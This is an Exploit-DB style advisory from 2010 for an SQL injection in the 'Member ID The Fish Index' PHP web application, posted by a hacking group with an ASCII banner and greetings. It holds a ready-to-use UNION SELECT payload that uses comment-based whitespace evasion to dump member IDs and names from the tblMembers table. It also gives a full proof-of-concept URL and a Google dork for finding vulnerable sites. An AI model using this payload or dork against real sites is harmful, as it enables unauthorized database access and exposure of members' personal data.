Member ID The Fish Index PHP - SQL Injection

EDB-ID:

12850

CVE:

N/A


Author:

v4lc0m87

Type:

webapps


Platform:

PHP

Date:

2010-06-03


*************************************************************************
 ,                              
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                  
*************************************************************************
[V] Member ID The Fish Index PHP SQL Injection Vulnerability
 
            --==[ Author ]==--

[+] Author  : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group   : INDONESIAN CYBER
[+] Site    : http://indonesian-cyber.org/
[+] Date    : June, 3-2010 [INDONESIA]
 
*************************************************************************
            --==[ Details ]==--
 
[+] Vulnerable  : SQL Injection
[+] Google Dork : inurl:index.php?myPlantId=
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
[-] Exploit :
[+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
 
[-] Remote SQLi p0c :
[+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
     
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
 
[V] Greetz :
SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (di FB koq curhat mlu sih koh :p)
blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!